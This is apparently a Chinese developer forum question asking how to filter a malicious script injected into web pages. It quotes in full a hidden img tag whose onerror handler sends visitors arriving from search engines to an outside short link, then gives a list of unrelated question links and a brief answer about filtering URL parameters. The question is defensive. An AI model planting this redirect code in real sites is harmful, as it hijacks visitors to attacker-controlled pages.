如何过滤src中的恶意脚本,如何在服务器中对这种进行有效的过滤<img style="display: none; color: red;" onerror="if( document.referrer.indexOf('query=')!=-1 || document.referrer.indexOf('q=')!=-1 || document.referrer.indexOf('wd=')!=-1 ){window.location.href='http://126.am/G1vu03'}" src="done"/>
解决方案 »
- 【菜鸟提问】关于网页在浏览器兼容性问题
- iis中access权限设置问题“操作必须使用一个可更新的查询”
- 找不到类型或命名空间名称“PageChangedEventArgs”(是否缺少 using 指令或程序集引用?)
- ASP.NET 页面代码分离后如何调试
- 在vs2005中 用iframe做编辑器后读取的问题???????急?急?急?
- checkboxlist的问题
- asp.net(vb)如何在页面输出图片
- 请问:DataList里没有<Item Template>这个属性??
- 在线急等 password 密码框的问题
- 我用原来vb,想在想进入asp.net给我推荐一本书吧?
- dg的一个属性
- asp.net如何连接mysql 数据库
http://126.am/G1vu03 后面的参数注入?你对URL参数进行特殊字符过滤就行了。